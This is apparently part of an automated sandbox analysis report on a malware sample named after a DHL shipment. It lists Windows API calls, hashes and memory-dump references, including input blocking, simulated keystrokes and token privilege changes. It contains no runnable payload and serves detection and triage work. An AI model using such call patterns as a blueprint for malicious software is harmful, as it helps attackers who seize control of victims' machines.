                                                                                            • Opcode ID: 79f2daea4feae865ede14ff0d389b950b97c21ad31fb807c620713033855e416
                                                                                            • Instruction ID: 82b63f33601866b765bb1bb1dc790f0e80af9565e4a2b3a2264ebf2c75dad450
                                                                                            • Opcode Fuzzy Hash: 79f2daea4feae865ede14ff0d389b950b97c21ad31fb807c620713033855e416
                                                                                            • Instruction Fuzzy Hash: 241191B2814309AFD718AF54DC8AD6AB7FDFF44754B20852EF05697245EB70BC428B60
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0088D608
                                                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0088D645
                                                                                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0088D650
                                                                                            Similarity
                                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                                            • String ID:
                                                                                            • API String ID: 33631002-0
                                                                                            • Opcode ID: e83914654b265254230d33821e9d879611187cd295c9c3aa69fa97d2d571e0de
                                                                                            • Instruction ID: 17f960385ecdcdbc9de0b87141b23bb78ae0b6fe998822a87e2559f823c0ad5e
                                                                                            • Opcode Fuzzy Hash: e83914654b265254230d33821e9d879611187cd295c9c3aa69fa97d2d571e0de
                                                                                            • Instruction Fuzzy Hash: BC113C75E05228BBDB209F99AC45FAFBBBCFB45B50F108125F904E7290D6705A058BA1
                                                                                            APIs
                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0088168C
                                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008816A1
                                                                                            • FreeSid.ADVAPI32(?), ref: 008816B1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                            • String ID:
                                                                                            • API String ID: 3429775523-0
                                                                                            • Opcode ID: d5a39dc7c034215818bd490d9cc8436dee6d37bb78d58c72b7fb5c80122a8b5d
                                                                                            • Instruction ID: 4862c481f041fafdfccfad57bfaae6b99af5e6cab8e22d8114e47940392665a2
                                                                                            • Opcode Fuzzy Hash: d5a39dc7c034215818bd490d9cc8436dee6d37bb78d58c72b7fb5c80122a8b5d
                                                                                            • Instruction Fuzzy Hash: CCF0F471950309FBDF00EFE49C89AAEBBBCFB08604F504565E501E2181E774AA458B60
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(008528E9,?,00844CBE,008528E9,008E88B8,0000000C,00844E15,008528E9,00000002,00000000,?,008528E9), ref: 00844D09
                                                                                            • TerminateProcess.KERNEL32(00000000,?,00844CBE,008528E9,008E88B8,0000000C,00844E15,008528E9,00000002,00000000,?,008528E9), ref: 00844D10
                                                                                            • ExitProcess.KERNEL32 ref: 00844D22
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 1703294689-0
                                                                                            • Opcode ID: 6f848377bae4835d1f38fdb07eae0f3c0737fee0e968780550e56d9cfceefa04
                                                                                            • Instruction ID: 96a3b89e7aff149f69637cb5ae19bda256f5516ccf0ae8ab225dfe92c8c1d2f6
                                                                                            • Opcode Fuzzy Hash: 6f848377bae4835d1f38fdb07eae0f3c0737fee0e968780550e56d9cfceefa04
                                                                                            • Instruction Fuzzy Hash: 23E0B631400148ABCF11AF58DD09B583BA9FB45781B504118FC16DA222CB35DD42DA80
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: /
                                                                                            • API String ID: 0-2043925204
                                                                                            • Opcode ID: 717ed2102f6c94f1168b6f18fd0060ff5094855aab11909d7974312f717ece60
                                                                                            • Instruction ID: 4e8a1bb47a9476884f5be0df933881f3137c9d031520ca3d1412eccabb45cee4
                                                                                            • Opcode Fuzzy Hash: 717ed2102f6c94f1168b6f18fd0060ff5094855aab11909d7974312f717ece60
                                                                                            • Instruction Fuzzy Hash: 82411572900319AFCB209FB9CC89EAB77B9FB84356F5042A9FD05D7280E6709D858F50
                                                                                            APIs
                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0087D28C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: NameUser
                                                                                            • String ID: X64
                                                                                            • API String ID: 2645101109-893830106
                                                                                            • Opcode ID: 530ef1d5707af4bc2f2557e65155a3f68ea779338d22c2be6fec52a7736b5d46
                                                                                            • Instruction ID: 8bc0f2c5ef05d18aedef09f854c8bbc88979a6f93606d9967a17eff7dedb23a5
                                                                                            • Opcode Fuzzy Hash: 530ef1d5707af4bc2f2557e65155a3f68ea779338d22c2be6fec52a7736b5d46
                                                                                            • Instruction Fuzzy Hash: 31D0C9B581121DEBCF94DB90EC88DDDB77CFB14309F104252F506E2000DB3095499F10
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                            • Instruction ID: 947fad7bcda00065bb690932772d9341e13090353a5f50920754c27451ad841c
                                                                                            • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                            • Instruction Fuzzy Hash: 1F023C71E012199FDF54CFA9C8806ADFBF5FF88314F25816AD919EB380D731AA418B94
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00896918
                                                                                            • FindClose.KERNEL32(00000000), ref: 00896961
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileFirst
                                                                                            • String ID:
                                                                                            • API String ID: 2295610775-0
                                                                                            • Opcode ID: d558397cecfd609c3dd17adbeb30e5d2758762ab03f57788bcb0d006c3ac8e09
                                                                                            • Instruction ID: bb0209799c86b9dcb6f3cff5c5ca628e222bd030f3a337bd9e3fd29e00ff6441
                                                                                            • Opcode Fuzzy Hash: d558397cecfd609c3dd17adbeb30e5d2758762ab03f57788bcb0d006c3ac8e09
                                                                                            • Instruction Fuzzy Hash: EE1193316042109FCB10DF29D484A16BBE5FF89328F18C699F469CF6A2DB30EC45CB91
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,008A4891,?,?,00000035,?), ref: 008937E4
                                                                                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,008A4891,?,?,00000035,?), ref: 008937F4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: ErrorFormatLastMessage
                                                                                            • String ID:
                                                                                            • API String ID: 3479602957-0
                                                                                            • Opcode ID: 475aef8fa37891a20a3ef209c1c13df271a6ac2c9dfa6e4b9bdc943b7a23c7dc
                                                                                            • Instruction ID: bda43ee956e6dd20d7b27355ba46fb888a216fd718ff549bbbbb7c6cc2666133
                                                                                            • Opcode Fuzzy Hash: 475aef8fa37891a20a3ef209c1c13df271a6ac2c9dfa6e4b9bdc943b7a23c7dc
                                                                                            • Instruction Fuzzy Hash: 29F0E5B06042283AEB2027AA9C4DFEB3BAEFFC4765F000275F509D2291D9609944C6B1
                                                                                            APIs
                                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0088B25D
                                                                                            • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0088B270
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InputSendkeybd_event
                                                                                            • String ID:
                                                                                            • API String ID: 3536248340-0
                                                                                            • Opcode ID: 9a2f6646be96e78d1b5ce49efc4518316edf6f0c00c5cf86e8e4183ef3d9d8f3
                                                                                            • Instruction ID: 09d485d918856fbdd54c028882df1a146eea770bdf3313791f53958e06e65024
                                                                                            • Opcode Fuzzy Hash: 9a2f6646be96e78d1b5ce49efc4518316edf6f0c00c5cf86e8e4183ef3d9d8f3
                                                                                            • Instruction Fuzzy Hash: 6FF01D7180424DABDB159FA4C805BEE7BB4FF04309F008119F955A6191C77996119F94
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008811FC), ref: 008810D4
                                                                                            • CloseHandle.KERNEL32(?,?,008811FC), ref: 008810E9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 81990902-0
                                                                                            • Opcode ID: 052fd9cb7ae46bab63d0489b6b8ce1622ce61d36ec74f3738c949b4afb88abde
                                                                                            • Instruction ID: 3b1e798e161ffba9aefedd8b744006bc51f12db7b4ecd253eb37c33f70fd14a8
                                                                                            • Opcode Fuzzy Hash: 052fd9cb7ae46bab63d0489b6b8ce1622ce61d36ec74f3738c949b4afb88abde
                                                                                            • Instruction Fuzzy Hash: 17E04F32408600AFE7252B15FC09E7377E9FB04310F10892DF5A5C04B1DB626C90DB90
                                                                                            Strings
                                                                                            • Variable is not of type 'Object'., xrefs: 00870C40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Variable is not of type 'Object'.
                                                                                            • API String ID: 0-1840281001
                                                                                            • Opcode ID: e572fcb974924933d604c90ff45d866d097cf006a73c04ac90d048ca9ab73744
                                                                                            • Instruction ID: a76ef60719fabd79f82abb9a35e67fb9fdcaf43ca33ab2b69d6df3a43dea4caf
                                                                                            • Opcode Fuzzy Hash: e572fcb974924933d604c90ff45d866d097cf006a73c04ac90d048ca9ab73744
                                                                                            • Instruction Fuzzy Hash: 13329E70900228DBCF14DF94E981AFDB7B5FF05308F548059E80AEB296DB75AE85CB61
                                                                                            APIs
                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00856766,?,?,00000008,?,?,0085FEFE,00000000), ref: 00856998
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionRaise
                                                                                            • String ID:
                                                                                            • API String ID: 3997070919-0
                                                                                            • Opcode ID: a6c69d2bd1ce8cada784dffdf945f6c183f0174e974ccbcd49c0807b086f28e4
                                                                                            • Instruction ID: 969cc35116df706dd5b830dd02163ad695f3f60e9fb1243a71e8a0c9eea8c377
                                                                                            • Opcode Fuzzy Hash: a6c69d2bd1ce8cada784dffdf945f6c183f0174e974ccbcd49c0807b086f28e4
                                                                                            • Instruction Fuzzy Hash: 84B17D31610608DFD715CF28C486B647BE0FF0536AF698658EC99CF2A2D335D9A9CB40
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: 702c57e116b37593e27156eb17eb90d6c945dff871dc7867fea97f74947a4197
                                                                                            • Instruction ID: f7df2a2c40b57e1a074a6e850f2713660b126416bb3f87777c3fef49e28d731f
                                                                                            • Opcode Fuzzy Hash: 702c57e116b37593e27156eb17eb90d6c945dff871dc7867fea97f74947a4197
                                                                                            • Instruction Fuzzy Hash: F5124EB1A00229DBCB14CF58C8816EEB7F5FF48710F14819AE949EB255EB349E81CB95
                                                                                            APIs
                                                                                            • BlockInput.USER32(00000001), ref: 0089EABD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: BlockInput
                                                                                            • String ID:
                                                                                            • API String ID: 3456056419-0
                                                                                            • Opcode ID: 53b45459a080f65e84f97c93d7b6866fbc605e552404e283c2400f4763914d06
                                                                                            • Instruction ID: c605d7c6e20937d5957756a16c3d837c386aa079a5b8c4a823fe63656f7c5cdf
                                                                                            • Opcode Fuzzy Hash: 53b45459a080f65e84f97c93d7b6866fbc605e552404e283c2400f4763914d06
                                                                                            • Instruction Fuzzy Hash: 9CE012312002149FD710EF59D404E5ABBD9FFA8760F048416FC45C7261DA70A8418B91
                                                                                            APIs
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,008403EE), ref: 008409DA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: 7d17f19d7c7fd0006d3388b4122e2078a3175dd1348c0bb95df92b5a0295d9c7
                                                                                            • Instruction ID: f95133f4abdd9a41895b434edb67ccd86ca5f11854a4c495a2c3c205ee053717
                                                                                            • Opcode Fuzzy Hash: 7d17f19d7c7fd0006d3388b4122e2078a3175dd1348c0bb95df92b5a0295d9c7
                                                                                            • Instruction Fuzzy Hash:
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0
                                                                                            • API String ID: 0-4108050209
                                                                                            • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                            • Instruction ID: 95cb9d7062ade8681bc68663e75502b80089f5123516ad6cfbc0c1db0ac80d8b
                                                                                            • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                            • Instruction Fuzzy Hash: 0551787160C74D9BDB38856C885E7BE6F89FB22344F180939D882D7282CB19DE05D35A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b9c99f71d091652293ddb3cb631f8af7e6875ecf99ffdaaf187a91456f870075
                                                                                            • Instruction ID: 35ae6959daee4729670cb96ba7fe0ed5abd4364a172b1fb624545bdb1f60eaba
                                                                                            • Opcode Fuzzy Hash: b9c99f71d091652293ddb3cb631f8af7e6875ecf99ffdaaf187a91456f870075
                                                                                            • Instruction Fuzzy Hash: 1832F122D29F014DD7239634E822335A659FFB73D6F15D737E81AB5AA6EB39C4834100
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 07cfa6e89399ad964bd01f23c845b32bfcae3f3b494fb0d46f1019bf8d6d3326
                                                                                            • Instruction ID: d26401f60a4ae6167ba94ab1ec414cf4d87a6624906d6586be92605638a29704
                                                                                            • Opcode Fuzzy Hash: 07cfa6e89399ad964bd01f23c845b32bfcae3f3b494fb0d46f1019bf8d6d3326
                                                                                            • Instruction Fuzzy Hash: 25320532A041598BCF28CE29C4D467DBBA1FB85314F28C56ED85EDB299D730DD82DB81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 102fa6acb381741b2ccab93968a8aaa05584cab7d1fa42c108e20e7fc9cee81f
                                                                                            • Instruction ID: 5c17aba93d889361260769fd1ed2f5ca962366ae17bf7096834218d9f26212a4
                                                                                            • Opcode Fuzzy Hash: 102fa6acb381741b2ccab93968a8aaa05584cab7d1fa42c108e20e7fc9cee81f
                                                                                            • Instruction Fuzzy Hash: 7022CFB0A0061ADFDF14CF69D981AAEB3B1FF44314F104529E812EB391EB36AD50CB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 92b0b9a4ff0bd22a4438506587dc463b08fbe50dfebcc4836e59e9a2dd77b856
                                                                                            • Instruction ID: 536dc7008219c4cefa6c0fb647c54d221d9b8453bc463f2d2526763da74321a6
                                                                                            • Opcode Fuzzy Hash: 92b0b9a4ff0bd22a4438506587dc463b08fbe50dfebcc4836e59e9a2dd77b856
                                                                                            • Instruction Fuzzy Hash: 6602B5B0E00219EBDB04DF58D881AAEB7B1FF54304F118169E956DB391EB31AE60CBD1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                            • Instruction ID: d3116f785be5b75acc22248754da08ac11d87f711e166a5930443ad4e1228a13
                                                                                            • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                            • Instruction Fuzzy Hash: BC9168726080EB49DF294639857C13DFFE1FA523A531A079ED4F2CB1C5FE249994D620
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                            • Instruction ID: d023fd351b0204b6fb5844539d043cb73b58096f3a0aa6ba5901eb247ff77f6c
                                                                                            • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                            • Instruction Fuzzy Hash: 0E9134722091EB4ADF6D867A857C03DFFE1EA923B531A079DD4F2CA1C1FE248594D620
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c698811c254abc55612932da550567659efaf87d46e3ef5afbeeaed67303db3c
                                                                                            • Instruction ID: 512b0f9dd9f4b51383d97fecb4b838d94be115fa947ea0544061896ec2fa17bb
                                                                                            • Opcode Fuzzy Hash: c698811c254abc55612932da550567659efaf87d46e3ef5afbeeaed67303db3c
                                                                                            • Instruction Fuzzy Hash: 4661887160875D96EE34DA2C8C95BBE3398FF51768F10091EE983DB281DB119E42C356
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
